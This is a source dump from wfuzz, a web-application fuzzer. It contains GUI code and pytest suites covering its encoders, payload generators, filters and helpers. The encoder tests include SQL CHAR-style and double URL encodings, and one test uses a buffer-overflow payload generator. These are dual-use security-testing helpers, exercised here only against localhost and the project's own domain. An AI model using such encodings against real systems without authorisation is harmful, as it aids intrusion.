"wfilter": 24 | self.do_wfilter(cmd) 25 | elif cmd[0] == "newtab": 26 | self.do_tab(cmd) 27 | elif cmd[0] == "del": 28 | self.do_delete(cmd) 29 | 30 | def do_wfilter(self, cmd): 31 | from wfuzz.core import dictionary 32 | 33 | try: 34 | session_options = CLParser(cmd).parse_cl() 35 | except SystemExit: 36 | print("\n") 37 | pass 38 | except Exception: 39 | pass 40 | else: 41 | for res in dictionary.from_options(session_options): 42 | r = res[0] 43 | if "FuzzResult" in str(r.__class__): 44 | r._fields = r.url 45 | 46 | self.model.AddRow(r) 47 | 48 | def do_wfuzz(self, cmd): 49 | try: 50 | session_options = CLParser(cmd).parse_cl().compile() 51 | except SystemExit: 52 | print("\n") 53 | pass 54 | except Exception: 55 | pass 56 | else: 57 | for res in session_options.fuzz(): 58 | self.model.AddRow(res) 59 | 60 | def do_delete(self, cmd): 61 | self.model.DeleteRows_by_filter(cmd[1]) 62 | 63 | def do_tab(self, cmd): 64 | data = Facade().data[cmd[1]] = [] 65 | model = GUIModel(data) 66 | pub.sendMessage( 67 | "create_tab", name=cmd[1], model=model, interp=WfuzzInterpreter(model) 68 | ) 69 | 70 | 71 | class GUIController: 72 | def __init__(self, view): 73 | Facade().mode = "gui" 74 | self.data = Facade().data = {"main": []} 75 | self._model = GUIModel(self.data["main"]) 76 | 77 | self._view = view 78 | self._interp = WfuzzInterpreter(self._model) 79 | 80 | # init gui 81 | self.start_gui() 82 | 83 | pub.subscribe(self.on_exit, "exit") 84 | 85 | def start_gui(self): 86 | self._view.start_gui(self) 87 | 88 | def on_exit(self, msg): 89 | print("oooo") 90 | -------------------------------------------------------------------------------- /src/wfuzz/ui/gui/model.py: -------------------------------------------------------------------------------- 1 | from collections import namedtuple 2 | import wx.dataview as dv 3 | 4 | from wfuzz.filters.ppfilter import FuzzResFilter 5 | 6 | Row = namedtuple("Row", "title colid width rtype field") 7 | 8 | 9 | class 
GUIModel(dv.PyDataViewIndexListModel): 10 | def __init__(self, data=None): 11 | self.data = data if data is not None else [] 12 | dv.PyDataViewIndexListModel.__init__(self, len(self.data)) 13 | 14 | self.row_mapper = { 15 | 0: Row(title="ID", colid=0, width=100, rtype="int", field="nres"), 16 | 1: Row(title="Response", colid=1, width=100, rtype="int", field="code"), 17 | 2: Row(title="Lines", colid=2, width=170, rtype="int", field="lines"), 18 | 3: Row(title="Words", colid=3, width=170, rtype="int", field="words"), 19 | 4: Row(title="Chars", colid=4, width=170, rtype="int", field="chars"), 20 | 5: Row( 21 | title="Payload", colid=5, width=170, rtype="string", field="description" 22 | ), 23 | } 24 | 25 | def GetColumnType(self, col): 26 | return self.row_mapper[col].rtype 27 | 28 | def GetValueByRow(self, row, col): 29 | try: 30 | return self.data[row].get_field(self.row_mapper[col].field) 31 | except IndexError: 32 | return "" 33 | 34 | def GetColumnCount(self): 35 | return len(self.row_mapper) 36 | 37 | def GetCount(self): 38 | return len(self.data) 39 | 40 | # Called to check if non-standard attributes should be used in the 41 | # cell at (row, col) 42 | def GetAttrByRow(self, row, col, attr): 43 | # #self.log.write('GetAttrByRow: (%d, %d)' % (row, col)) 44 | # if col == 3: 45 | # attr.SetColour('blue') 46 | # attr.SetBold(True) 47 | # return True 48 | return False 49 | 50 | def Compare(self, item1, item2, col, ascending): 51 | if not ascending: # swap sort order? 
52 | item2, item1 = item1, item2 53 | row1 = self.GetRow(item1) 54 | row2 = self.GetRow(item2) 55 | 56 | value1 = self.GetValueByRow(row1, col) 57 | value2 = self.GetValueByRow(row2, col) 58 | if self.row_mapper[col].rtype == "int": 59 | value1 = int(value1) 60 | value2 = int(value2) 61 | 62 | return (value1 > value2) - (value1 < value2) 63 | 64 | def DeleteRows(self, rows): 65 | # make a copy since we'll be sorting(mutating) the list 66 | rows = list(rows) 67 | # use reverse order so the indexes don't change as we remove items 68 | rows.sort(reverse=True) 69 | 70 | for row in rows: 71 | # remove it from our data structure 72 | del self.data[row] 73 | # notify the view(s) using this model that it has been removed 74 | self.RowDeleted(row) 75 | 76 | def AddRow(self, value): 77 | self.data.append(value) 78 | self.RowAppended() 79 | 80 | def Clear(self): 81 | self.data = [] 82 | self.Cleared() 83 | 84 | def DeleteRows_by_filter(self, filter_string): 85 | ffilter = FuzzResFilter(filter_string=filter_string) 86 | 87 | for row, item in reversed(list(enumerate(self.data))): 88 | if ffilter.is_visible(item): 89 | del self.data[row] 90 | self.RowDeleted(row) 91 | -------------------------------------------------------------------------------- /src/wxfuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from wfuzz.wfuzz import main_gui 4 | 5 | if __name__ == "__main__": 6 | main_gui() 7 | -------------------------------------------------------------------------------- /tests/acceptance/test_saved_filter.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import os 3 | import tempfile 4 | 5 | import wfuzz 6 | 7 | 8 | def get_temp_file(): 9 | temp_name = next(tempfile._get_candidate_names()) 10 | defult_tmp_dir = tempfile._get_default_tempdir() 11 | 12 | return os.path.join(defult_tmp_dir, temp_name) 13 | 14 | 15 | def test_filter_prev_payload(): 16 | 17 
| filename = get_temp_file() 18 | for res in wfuzz.get_session( 19 | "-z range --zD 0-0 -H test:1 -u http://localhost:9000/anything/FUZZ" 20 | ).fuzz(save=filename): 21 | pass 22 | 23 | filename_new = get_temp_file() 24 | for res in wfuzz.get_session( 25 | "-z wfuzzp --zD {} -u FUZZ -H test:2 --oF {}".format(filename, filename_new) 26 | ).fuzz(save=filename_new): 27 | pass 28 | 29 | assert ( 30 | len( 31 | list( 32 | wfuzz.get_session( 33 | "-z wfuzzp --zD {} --slice r.headers.request.test=2 --dry-run -u FUZZ".format( 34 | filename_new 35 | ) 36 | ).fuzz() 37 | ) 38 | ) 39 | == 1 40 | ) 41 | assert ( 42 | len( 43 | list( 44 | wfuzz.get_session( 45 | "-z wfuzzp --zD {} --slice FUZZ[r.headers.request.test]=1 --dry-run -u FUZZ".format( 46 | filename_new 47 | ) 48 | ).fuzz() 49 | ) 50 | ) 51 | == 1 52 | ) 53 | -------------------------------------------------------------------------------- /tests/api/test_encoders.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import wfuzz 3 | 4 | 5 | @pytest.mark.parametrize( 6 | "encoder, text, expected_result", 7 | [ 8 | ("none", "test", "test"), 9 | ("urlencode", "../=?&", "../%3D%3F%26"), 10 | ("double_urlencode", "../=?&", "../%253D%253F%2526"), 11 | ("double_urlencode", "../=?&", "../%253D%253F%2526"), 12 | ("base64", "admin", "YWRtaW4="), 13 | ("sha1", "admin", "d033e22ae348aeb5660fc2140aec35850c4da997"), 14 | ("md5", "admin", "21232f297a57a5a743894a0e4a801fc3"), 15 | ("hexlify", "admin", "61646d696e"), 16 | ("html_escape", "<>&'\"/", "<>&'"/"), 17 | ("html_decimal", "<>&'\"/", "<>&'"/"), 18 | ("html_hexadecimal", "<>&'\"/", "<>&'"/"), 19 | ("mysql_char", "admin", "CHAR(97,100,109,105,110)"), 20 | ("mssql_char", "admin", "CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)"), 21 | ("oracle_char", "admin", "chr(97)||chr(100)||chr(109)||chr(105)||chr(110)"), 22 | ], 23 | ) 24 | def test_encode(encoder, text, expected_result): 25 | assert wfuzz.encode(encoder, text) == 
expected_result 26 | 27 | 28 | @pytest.mark.parametrize( 29 | "encoder, text, expected_result", 30 | [ 31 | ("none", "test", "test"), 32 | ("urlencode", "../=?&", "../%3D%3F%26"), 33 | ("double_urlencode", "../=?&", "../%253D%253F%2526"), 34 | ("double_urlencode", "../=?&", "../%253D%253F%2526"), 35 | ("base64", "admin", "YWRtaW4="), 36 | ("hexlify", "admin", "61646d696e"), 37 | ("mysql_char", "admin", "CHAR(97,100,109,105,110)"), 38 | ("mssql_char", "admin", "CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110)"), 39 | ("oracle_char", "admin", "chr(97)||chr(100)||chr(109)||chr(105)||chr(110)"), 40 | ], 41 | ) 42 | def test_decode(encoder, text, expected_result): 43 | assert wfuzz.decode(encoder, expected_result) == text 44 | -------------------------------------------------------------------------------- /tests/api/test_payload.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import wfuzz 3 | 4 | 5 | @pytest.mark.parametrize( 6 | "params, expected_result", 7 | [ 8 | ( 9 | { 10 | "iterator": "zip", 11 | "payloads": [ 12 | ("range", {"default": "0-2", "encoder": None}, None), 13 | ("range", {"default": "0-2", "encoder": None}, None), 14 | ], 15 | }, 16 | [("0", "0"), ("1", "1"), ("2", "2")], 17 | ), 18 | ( 19 | { 20 | "iterator": "chain", 21 | "payloads": [ 22 | ("range", {"default": "0-2", "encoder": None}, None), 23 | ("range", {"default": "0-2", "encoder": None}, None), 24 | ], 25 | }, 26 | [("0",), ("0",), ("1",), ("1",), ("2",), ("2",)], 27 | ), 28 | ( 29 | { 30 | "iterator": "product", 31 | "payloads": [ 32 | ("range", {"default": "0-2", "encoder": None}, None), 33 | ("range", {"default": "0-2", "encoder": None}, None), 34 | ], 35 | }, 36 | [ 37 | ("0", "0"), 38 | ("0", "1"), 39 | ("0", "2"), 40 | ("1", "0"), 41 | ("1", "1"), 42 | ("1", "2"), 43 | ("2", "0"), 44 | ("2", "1"), 45 | ("2", "2"), 46 | ], 47 | ), 48 | ( 49 | {"payloads": [("range", {"default": "0-4", "encoder": None}, None)]}, 50 | [("0",), 
("1",), ("2",), ("3",), ("4",)], 51 | ), 52 | ( 53 | { 54 | "payloads": [ 55 | ("buffer_overflow", {"default": "10", "encoder": None}, None) 56 | ] 57 | }, 58 | [("AAAAAAAAAA",)], 59 | ), 60 | ( 61 | {"payloads": [("hexrange", {"default": "09-10", "encoder": None}, None)]}, 62 | [("09",), ("0a",), ("0b",), ("0c",), ("0d",), ("0e",), ("0f",), ("10",)], 63 | ), 64 | ( 65 | {"payloads": [("hexrange", {"default": "009-00B", "encoder": None}, None)]}, 66 | [("009",), ("00a",), ("00b",)], 67 | ), 68 | ( 69 | { 70 | "payloads": [ 71 | ("ipnet", {"default": "192.168.0.1/30", "encoder": None}, None) 72 | ] 73 | }, 74 | [("192.168.0.1",), ("192.168.0.2",)], 75 | ), 76 | ( 77 | { 78 | "payloads": [ 79 | ( 80 | "iprange", 81 | {"default": "192.168.0.1-192.168.0.2", "encoder": None}, 82 | None, 83 | ) 84 | ] 85 | }, 86 | [("192.168.0.1",), ("192.168.0.2",)], 87 | ), 88 | ( 89 | {"payloads": [("list", {"default": "a-b", "encoder": None}, None)]}, 90 | [("a",), ("b",)], 91 | ), 92 | ( 93 | {"payloads": [("list", {"default": "a\\-b-b", "encoder": None}, None)]}, 94 | [("a-b",), ("b",)], 95 | ), 96 | ( 97 | {"payloads": [("range", {"default": "1-2", "encoder": None}, None)]}, 98 | [("1",), ("2",)], 99 | ), 100 | ], 101 | ) 102 | def test_payload_iterator(params, expected_result): 103 | assert sorted(list(wfuzz.payload(**params))) == sorted(expected_result) 104 | 105 | 106 | @pytest.mark.parametrize( 107 | "payload, expected_result", 108 | [(range(4), [0, 1, 2, 3]), ([list(range(2)), list(range(2))], [[0, 1], [0, 1]])], 109 | ) 110 | def test_get_payload(payload, expected_result): 111 | assert sorted(wfuzz.get_payload(payload).data.get("dictio")[0]) == sorted( 112 | expected_result 113 | ) 114 | -------------------------------------------------------------------------------- /tests/api/test_session.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | import wfuzz 3 | 4 | 5 | @pytest.mark.parametrize( 6 | "session, 
expected_result", 7 | [ 8 | ( 9 | "-z range,0-4 http://127.0.0.1/FUZZ", 10 | { 11 | "allvars": None, 12 | "auth": {}, 13 | "colour": False, 14 | "compiled_baseline": None, 15 | "compiled_dictio": None, 16 | "compiled_filter": None, 17 | "compiled_prefilter": [], 18 | "compiled_printer": None, 19 | "compiled_seed": None, 20 | "compiled_stats": None, 21 | "concurrent": 10, 22 | "conn_delay": 90, 23 | "connect_to_ip": None, 24 | "console_printer": "", 25 | "cookie": [], 26 | "delay": None, 27 | "dictio": None, 28 | "exec_mode": "api", 29 | "fields": [], 30 | "filter": "", 31 | "follow": False, 32 | "hc": [], 33 | "headers": [], 34 | "hh": [], 35 | "hl": [], 36 | "hs": None, 37 | "hw": [], 38 | "interactive": False, 39 | "iterator": None, 40 | "method": None, 41 | "no_cache": False, 42 | "payloads": [("range", {"default": "0-4", "encoder": None}, None)], 43 | "postdata": None, 44 | "prefilter": [], 45 | "previous": False, 46 | "printer": (None, None), 47 | "proxies": None, 48 | "recipe": [], 49 | "req_delay": 90, 50 | "retries": 3, 51 | "rlevel": 0, 52 | "dlevel": 4, 53 | "save": "", 54 | "sc": [], 55 | "scanmode": False, 56 | "script": "", 57 | "script_args": {}, 58 | "seed_payload": False, 59 | "sh": [], 60 | "show_field": None, 61 | "sl": [], 62 | "ss": None, 63 | "sw": [], 64 | "transport": "http", 65 | "url": "http://127.0.0.1/FUZZ", 66 | "verbose": False, 67 | }, 68 | ) 69 | ], 70 | ) 71 | def test_get_payload(session, expected_result): 72 | assert wfuzz.get_session(session).data == expected_result 73 | -------------------------------------------------------------------------------- /tests/conftest.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | 3 | 4 | from wfuzz.fuzzrequest import FuzzRequest 5 | from wfuzz.fuzzobjects import FuzzResult 6 | from wfuzz.fuzzobjects import FPayloadManager 7 | from wfuzz.filters.ppfilter import FuzzResFilter 8 | from wfuzz.facade import Facade 9 | 10 | 11 | @pytest.fixture 
12 | def full_fuzzres(request): 13 | raw_req, raw_resp = request.param 14 | fr = FuzzRequest() 15 | fr.update_from_raw_http(raw_req, "http", raw_resp, None) 16 | 17 | return FuzzResult(history=fr) 18 | 19 | 20 | @pytest.fixture 21 | def full_fuzzreq(request): 22 | raw_req, raw_resp = request.param 23 | fr = FuzzRequest() 24 | fr.update_from_raw_http(raw_req, "http", raw_resp, None) 25 | 26 | return fr 27 | 28 | 29 | @pytest.fixture 30 | def fuzzres_from_url(request): 31 | fr = FuzzRequest() 32 | fr.url = request.param 33 | 34 | return FuzzResult(history=fr) 35 | 36 | 37 | @pytest.fixture 38 | def filter_obj(): 39 | return FuzzResFilter() 40 | 41 | 42 | @pytest.fixture 43 | def example_full_fuzzres(): 44 | raw_req, raw_resp = ( 45 | "GET /path?param1=1¶m2=2 HTTP/1.1\n" 46 | "Host: www.wfuzz.org\n" 47 | "User-Agent: curl/7.58.0\n" 48 | "Accept: */*\n" 49 | "Cookie: cookie1=1\n", 50 | "HTTP/1.1 302 Found\n" 51 | "Content-Type: text/html; charset=utf-8\n" 52 | "Content-Language: en\n" 53 | "Location: https://wfuzz.readthedocs.io/en/latest/\n" 54 | "Vary: Accept-Language, Cookie\n" 55 | "Server: nginx/1.14.0 (Ubuntu)\n" 56 | "X-Fallback: True\n" 57 | "X-Served: Django\n" 58 | "X-Deity: web01\n" 59 | "Date: Wed, 23 Jan 2019 21:43:59 GMT\n" 60 | "Content-Length: 0\n" 61 | "Set-Cookie: name=Nicholas; expires=Sat, 02 May 2009 23:38:25 GMT\n", 62 | ) 63 | fr = FuzzRequest() 64 | fr.update_from_raw_http( 65 | raw_req, "http", raw_resp, b"Some line\n and words\nasdsdas" 66 | ) 67 | 68 | return FuzzResult(history=fr) 69 | 70 | 71 | @pytest.fixture 72 | def example_full_fuzzres_content(request): 73 | raw_content = request.param 74 | 75 | raw_req, raw_resp = ( 76 | "GET /path?param1=1¶m2=2 HTTP/1.1\n" 77 | "Host: www.wfuzz.org\n" 78 | "User-Agent: curl/7.58.0\n" 79 | "Accept: */*\n" 80 | "Cookie: cookie1=1\n", 81 | "HTTP/1.1 200 OK\n" 82 | "Content-Type: text/html; charset=utf-8\n" 83 | "Content-Language: en\n" 84 | "Vary: Accept-Language, Cookie\n" 85 | "Server: nginx/1.14.0 
(Ubuntu)\n" 86 | "X-Fallback: True\n" 87 | "X-Served: Django\n" 88 | "X-Deity: web01\n" 89 | "Date: Wed, 23 Jan 2019 21:43:59 GMT\n" 90 | "Content-Length: 0\n" 91 | "Set-Cookie: name=Nicholas; expires=Sat, 02 May 2009 23:38:25 GMT\n", 92 | ) 93 | fr = FuzzRequest() 94 | fr.update_from_raw_http(raw_req, "http", raw_resp, raw_content) 95 | 96 | fuzzres = FuzzResult(history=fr) 97 | fuzzres.payload_man = FPayloadManager() 98 | 99 | return fuzzres 100 | 101 | 102 | @pytest.fixture 103 | def example_full_fuzzres_no_response(): 104 | raw_req = "GET /path?param1=1¶m2=2 HTTP/1.1\nHost: www.wfuzz.org\nUser-Agent: curl/7.58.0\nAccept: */*\n" 105 | 106 | fr = FuzzRequest() 107 | fr.update_from_raw_http(raw_req, "http", None, None) 108 | 109 | return FuzzResult(history=fr) 110 | 111 | 112 | @pytest.fixture 113 | def get_plugin(): 114 | def _get_customer_plugin(name): 115 | return [x() for x in Facade().scripts.get_plugins(name)] 116 | 117 | return _get_customer_plugin 118 | -------------------------------------------------------------------------------- /tests/filters/test_filter.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | 3 | 4 | @pytest.mark.parametrize( 5 | "filter_string, expected_result", 6 | [ 7 | ("h=28 or w=6 or l=2", True), 8 | ("r.params.get.param2='2'", True), 9 | ("r.headers.response.Location", "https://wfuzz.readthedocs.io/en/latest/"), 10 | ("r.headers.response.notthere", {}), 11 | ("r.params.get.notthere", {}), 12 | ("r.cookies.response.notthere", {}), 13 | ("r.cookies.response.notthere='something'", False), 14 | ("r.cookies.response.notthere~'something'", False), 15 | ("r.headers.request.Host", "www.wfuzz.org"), 16 | ("r.headers.request.host", "www.wfuzz.org"), 17 | ("r.headers.response.SeRVEr", "nginx/1.14.0 (Ubuntu)"), 18 | ("r.headers.response.server", "nginx/1.14.0 (Ubuntu)"), 19 | ("r.cookies.request.cookie1", "1"), 20 | ("r.cookies.request.cOOkiE1", "1"), 21 | ("r.cookies.response.name", 
"Nicholas"), 22 | ("r.cookies.response.nAMe", "Nicholas"), 23 | ("r.params.get.param1", "1"), 24 | ("r.params.get.pAraM1", "1"), 25 | ], 26 | ) 27 | def test_filter_ret_values( 28 | filter_obj, example_full_fuzzres, filter_string, expected_result 29 | ): 30 | assert filter_obj.is_visible(example_full_fuzzres, filter_string) == expected_result 31 | 32 | 33 | @pytest.mark.parametrize( 34 | "filter_string, expected_result", 35 | [ 36 | ("r.headers.response.notthere", {}), 37 | ("r.params.get.notthere", {}), 38 | ("r.cookies.response.notthere", {}), 39 | ("r.cookies.response.notthere='something'", False), 40 | ], 41 | ) 42 | def test_filter_ret_values_no_response( 43 | filter_obj, example_full_fuzzres_no_response, filter_string, expected_result 44 | ): 45 | assert ( 46 | filter_obj.is_visible(example_full_fuzzres_no_response, filter_string) 47 | == expected_result 48 | ) 49 | 50 | 51 | @pytest.mark.parametrize( 52 | "filter_string, expected_result", 53 | [ 54 | ( 55 | "r.cookies.response.name|diff('test')", 56 | "--- prev\n\n+++ current\n\n@@ -1 +1 @@\n\n-test\n+Nicholas", 57 | ), 58 | ("r.cookies.response.nAMe|upper()", "NICHOLAS"), 59 | ("r.cookies.response.name|upper()", "NICHOLAS"), 60 | ("r.cookies.response.name|lower()", "nicholas"), 61 | ("r.cookies.response.name|startswith('N')", True), 62 | ("r.cookies.response.name|replace('N','n')", "nicholas"), 63 | ("'%2e%2e'|unquote()", ".."), 64 | ("'%2e%2f'|decode('urlencode')", "./"), 65 | ("'%%'|encode('urlencode')", "%25%25"), 66 | ], 67 | ) 68 | def test_filter_operators( 69 | filter_obj, example_full_fuzzres, filter_string, expected_result 70 | ): 71 | assert filter_obj.is_visible(example_full_fuzzres, filter_string) == expected_result 72 | -------------------------------------------------------------------------------- /tests/filters/test_filter_codes.py: -------------------------------------------------------------------------------- 1 | import pytest 2 | 3 | 4 | @pytest.mark.parametrize( 5 | "fuzzres_from_url, 
filter_string, expected_result", 6 | [ 7 | ( 8 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 9 | "r.urlp.scheme='http'", 10 | True, 11 | ), 12 | ( 13 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 14 | "r.urlp.netloc='www.wfuzz.org'", 15 | True, 16 | ), 17 | ( 18 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 19 | "r.urlp.path='/path/test.php'", 20 | True, 21 | ), 22 | ( 23 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 24 | "r.urlp.ffname='test.php'", 25 | True, 26 | ), 27 | ( 28 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 29 | "r.urlp.fname='test'", 30 | True, 31 | ), 32 | ( 33 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 34 | "r.urlp.hasquery", 35 | True, 36 | ), 37 | ( 38 | "http://www.wfuzz.org/path/test.php?param=1¶m2=2", 39 | "not r.urlp.isbllist", 40 | True, 41 | ), 42 | ], 43 | indirect=["fuzzres_from_url"], 44 | ) 45 | def test_urlp(filter_obj, fuzzres_from_url, filter_string, expected_result): 46 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result 47 | 48 | 49 | @pytest.mark.parametrize( 50 | "fuzzres_from_url, filter_string, expected_result", 51 | [("http://www.wfuzz.org/path?param=1¶m2=2", "r.is_path", False)], 52 | indirect=["fuzzres_from_url"], 53 | ) 54 | def test_ispath(filter_obj, fuzzres_from_url, filter_string, expected_result): 55 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result 56 | 57 | 58 | @pytest.mark.parametrize( 59 | "fuzzres_from_url, filter_string, expected_result", 60 | [ 61 | ( 62 | "http://www.wfuzz.org/path?param=1¶m2=2", 63 | "r.pstrip", 64 | "http://www.wfuzz.org/path-gparam-gparam2", 65 | ), 66 | ], 67 | indirect=["fuzzres_from_url"], 68 | ) 69 | def test_pstrip(filter_obj, fuzzres_from_url, filter_string, expected_result): 70 | assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result 71 | -------------------------------------------------------------------------------- 
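/tests/filters/test_filter_urlp.py:
--------------------------------------------------------------------------------
import pytest

# Both URLs carry two GET parameters (param, param2). test_pstrip's expected
# value names both of them, so the separator between them has to be "&".
URL_WITH_FILE = "http://www.wfuzz.org/path/test.php?param=1&param2=2"
URL_NO_FILE = "http://www.wfuzz.org/path?param=1&param2=2"


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [
        (URL_WITH_FILE, "r.urlp.scheme='http'", True),
        (URL_WITH_FILE, "r.urlp.netloc='www.wfuzz.org'", True),
        (URL_WITH_FILE, "r.urlp.path='/path/test.php'", True),
        (URL_WITH_FILE, "r.urlp.ffname='test.php'", True),
        (URL_WITH_FILE, "r.urlp.fname='test'", True),
        (URL_WITH_FILE, "r.urlp.hasquery", True),
        (URL_WITH_FILE, "not r.urlp.isbllist", True),
    ],
    indirect=["fuzzres_from_url"],
)
def test_urlp(filter_obj, fuzzres_from_url, filter_string, expected_result):
    """Each r.urlp.* filter expression evaluates to the expected value."""
    assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [(URL_NO_FILE, "r.is_path", False)],
    indirect=["fuzzres_from_url"],
)
def test_ispath(filter_obj, fuzzres_from_url, filter_string, expected_result):
    """r.is_path is False for this URL."""
    assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [(URL_NO_FILE, "r.pstrip", "http://www.wfuzz.org/path-gparam-gparam2")],
    indirect=["fuzzres_from_url"],
)
def test_pstrip(filter_obj, fuzzres_from_url, filter_string, expected_result):
    """r.pstrip returns the URL with the query replaced by its parameter names."""
    assert filter_obj.is_visible(fuzzres_from_url, filter_string) == expected_result

--------------------------------------------------------------------------------
/tests/filters/test_prefilter_mangle.py:
--------------------------------------------------------------------------------
import pytest

# Two GET parameters; the expected dictionaries below list both keys.
BASE_URL = "http://www.wfuzz.org/path?param=1&param2=2"


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [
        # "=+" appends, ":=" replaces, "=-" prepends (per the expected values).
        (BASE_URL, "r.url=+'test'", BASE_URL + "test"),
        (BASE_URL, "r.url:='test'", "http://test/"),
        (BASE_URL, "r.url=-'test'", "test" + BASE_URL),
    ],
    indirect=["fuzzres_from_url"],
)
def test_url_set(filter_obj, fuzzres_from_url, filter_string, expected_result):
    """Assignment operators in a filter rewrite the request URL in place."""
    filter_obj.is_visible(fuzzres_from_url, filter_string)
    assert fuzzres_from_url.history.url == expected_result


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [("http://www.wfuzz.org/path?param", "r.params.all=+'test'", {"param": None})],
    indirect=["fuzzres_from_url"],
)
def test_params_set_no_value(
    filter_obj, fuzzres_from_url, filter_string, expected_result
):
    """A parameter without a value stays None after an append to all params."""
    filter_obj.is_visible(fuzzres_from_url, filter_string)
    assert fuzzres_from_url.history.params.get == expected_result


@pytest.mark.parametrize(
    "fuzzres_from_url, filter_string, expected_result",
    [
        (BASE_URL, "r.params.get.param=+'test'", {"param": "1test", "param2": "2"}),
        (BASE_URL, "r.params.get.param=-'test'", {"param": "test1", "param2": "2"}),
        (BASE_URL, "r.params.all=+'2'", {"param": "12", "param2": "22"}),
        (BASE_URL, "r.params.all:='2'", {"param": "2", "param2": "2"}),
        # Appending or prepending to a missing parameter leaves the set unchanged;
        # only ":=" creates it.
        (BASE_URL, "r.params.get.notthere=-'2'", {"param": "1", "param2": "2"}),
        (BASE_URL, "r.params.get.notthere=+'2'", {"param": "1", "param2": "2"}),
        (
            BASE_URL,
            "r.params.get.notthere:='2'",
            {"notthere": "2", "param": "1", "param2": "2"},
        ),
    ],
    indirect=["fuzzres_from_url"],
)
def test_params_set(filter_obj, fuzzres_from_url, filter_string, expected_result):
    """Assignment operators in a filter rewrite the request parameters in place."""
    filter_obj.is_visible(fuzzres_from_url, filter_string)
    assert fuzzres_from_url.history.params.all == expected_result

--------------------------------------------------------------------------------
/tests/filters/test_prefilter_mangle_codes.py:
--------------------------------------------------------------------------------
import pytest


@pytest.mark.parametrize(
    "filter_string, expected_result",
    [("r.code:=429", 429), ("r.c:=404", 404), ("r.c=+404", 706), ("r.c=-2", 300)],
)
def test_code_set(filter_obj, example_full_fuzzres, filter_string, expected_result):
    """Assignment operators on r.code / r.c change the result's status code."""
    filter_obj.is_visible(example_full_fuzzres, filter_string)
    assert example_full_fuzzres.code == expected_result

--------------------------------------------------------------------------------
/tests/helpers/test_dotdict.py:
--------------------------------------------------------------------------------
import pytest

from wfuzz.helpers.obj_dic import DotDict
from wfuzz.helpers.obj_dyn import rgetattr


@pytest.fixture
def dotdict_ex1():
    return DotDict({"a": "1"})


@pytest.fixture
def dotdict_ex2():
    return DotDict({"a": "2"})


def test_operators(dotdict_ex1, dotdict_ex2):
    """'+' concatenates onto each value; adding two DotDicts keeps the right one's values."""
    assert dotdict_ex1 == {"a": "1"}
    assert dotdict_ex1 + "test" == {"a": "1test"}
    assert "test" + dotdict_ex1 == {"a": "test1"}
    assert dotdict_ex1 + dotdict_ex2 == {"a": "2"}
    assert dotdict_ex2 + dotdict_ex1 == {"a": "1"}


def test_nonexisting_key_returns_none(dotdict_ex1):
    # Despite the test name, the value asserted for a missing key is {}.
    assert dotdict_ex1["anything"] == {}


def test_nonexisting_attr_returns_empty_dict(dotdict_ex1):
    assert rgetattr(dotdict_ex1, "anything") == {}

--------------------------------------------------------------------------------
/tests/helpers/test_insensitive_dict.py:
--------------------------------------------------------------------------------
import pytest

from wfuzz.helpers.obj_dic import CaseInsensitiveDict


@pytest.fixture
def case_dict():
    return CaseInsensitiveDict({"OnE": 1})


@pytest.mark.parametrize("key, expected_result", [("one", 1), ("oNe", 1)])
def test_key_get_item(case_dict, key, expected_result):
    """Lookup by index and by .get() ignores the key's case."""
    assert case_dict[key] == expected_result
    assert case_dict.get(key) == expected_result


@pytest.mark.parametrize(
    "key, expected_result",
    [("One", True), ("OnE", True), ("one", True), ("onetwo", False)],
)
def test_key_in_item(case_dict, key, expected_result):
    """Membership tests ignore the key's case."""
    assert (key in case_dict) == expected_result


def test_update():
    """Keys added through update() are case-insensitive as well."""
    dd = CaseInsensitiveDict({})
    dd.update({"OnE": 1})

    assert dd["one"] == 1
    assert dd["oNe"] == 1


def test_key_in(case_dict):
    """keys() reports the key with the casing it was stored under."""
    assert list(case_dict.keys()) == ["OnE"]

--------------------------------------------------------------------------------
/tests/plugins/test_links.py:
--------------------------------------------------------------------------------
import pytest
import re

from queue import Queue


def _prepare_links_plugin(get_plugin, fuzzres):
    """Return the "links" plugin wired to a fresh queue and the given result."""
    plugin = get_plugin("links")[0]
    plugin.results_queue = Queue()
    plugin.base_fuzz_res = fuzzres
    plugin.add_path = False
    return plugin


def _seed_urls(plugin, fuzzres):
    """Run the plugin on *fuzzres* and return the URLs of the seeds it queued."""
    plugin.process(fuzzres)

    queued = []
    while not plugin.results_queue.empty():
        queued.append(plugin.results_queue.get())

    return [item._seed.history.url for item in queued if item._seed]


@pytest.mark.parametrize(
    "example_full_fuzzres_content, expected_links",
    [
        # getting data-href for now (b'<link rel="manifest" data-href="/android-chrome-manifest.json">\n', [],),
        (
            b'<href="1.json"href="2.json">\n',
            ["http://www.wfuzz.org/1.json", "http://www.wfuzz.org/2.json"],
        ),
        (
            b'<link rel="manifest" href="/android-chrome-manifest.json">\n',
            ["http://www.wfuzz.org/android-chrome-manifest.json"],
        ),
        (
            b'<link rel="alternate" href="https://www.wfuzz.org/" hreflang="en-AE" />',
            ["https://www.wfuzz.org/"],
        ),
        # Links pointing at other hosts yield no seeds with the default settings.
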